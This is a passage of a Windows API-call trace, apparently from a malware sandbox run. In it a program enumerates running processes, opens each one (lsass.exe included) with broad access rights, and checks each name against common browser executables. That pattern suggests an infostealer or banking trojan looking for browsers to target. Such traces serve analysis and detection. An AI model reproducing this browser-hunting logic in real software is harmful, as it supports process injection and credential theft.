	[0253.833] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0253.834] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0xaa0c
	[0253.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.834] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0253.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.835] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.835] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0253.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.836] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.836] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0253.837] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0xaa10
	[0253.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.837] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0253.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.838] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.838] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0253.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.838] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.839] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0253.839] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0xaa14
	[0253.840] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.840] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0253.840] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.840] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.840] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.840] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0253.840] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.840] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.841] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.841] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0xaa18
	[0253.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.842] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.842] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.842] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.843] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.843] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.844] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0xaa1c
	[0253.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.844] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.844] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.845] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.845] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.845] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.846] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0xaa20
	[0253.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.846] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.847] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.847] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.847] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.847] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.848] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0xaa24
	[0253.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.848] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.849] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.849] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.849] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.850] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.850] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0xaa28
	[0253.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.851] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.851] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.851] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.852] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.852] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.853] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0xaa2c
	[0253.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.853] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.854] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.854] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.854] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.855] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.855] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0xaa30
	[0253.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.856] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.856] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.856] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.857] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.857] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0253.858] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0xaa34
	[0253.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.858] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0253.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.858] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.858] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0253.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.859] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.859] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.860] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0xaa38
	[0253.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.860] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.861] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.861] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.861] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.862] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0253.862] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0xaa3c
	[0253.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.863] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.863] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.863] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.864] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.864] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0253.865] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0xaa40
	[0253.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.865] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0253.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.865] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.866] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0253.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.866] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.866] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.867] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0xaa44
	[0253.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.867] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.867] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.868] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.868] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.868] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0253.869] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0xaa48
	[0253.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.869] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0253.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.870] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.870] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0253.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.870] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.871] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0253.871] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0xaa4c
	[0253.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.871] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0253.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.872] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.872] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0253.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.872] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.873] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0253.873] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0xaa50
	[0253.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.874] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0253.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.874] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.874] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0253.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.874] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.875] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0253.875] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0xaa54
	[0253.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.876] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0253.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.876] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.876] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0253.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.877] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.877] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0253.878] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0253.878] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0253.879] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0xaa58
	[0253.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.879] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0253.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.879] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.880] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0253.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.881] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.881] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0253.882] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0xaa5c
	[0253.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.882] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0253.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.882] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.883] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0253.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.883] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.883] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0253.884] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0xaa60
	[0253.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.884] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0253.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.885] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.885] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0253.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.885] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.886] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0253.886] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0xaa64
	[0253.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.887] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0253.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.887] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.887] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0253.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.888] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.888] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0253.889] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0xaa68
	[0253.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.889] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0253.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.889] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.890] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0253.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.891] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.892] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0253.892] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0xaa6c
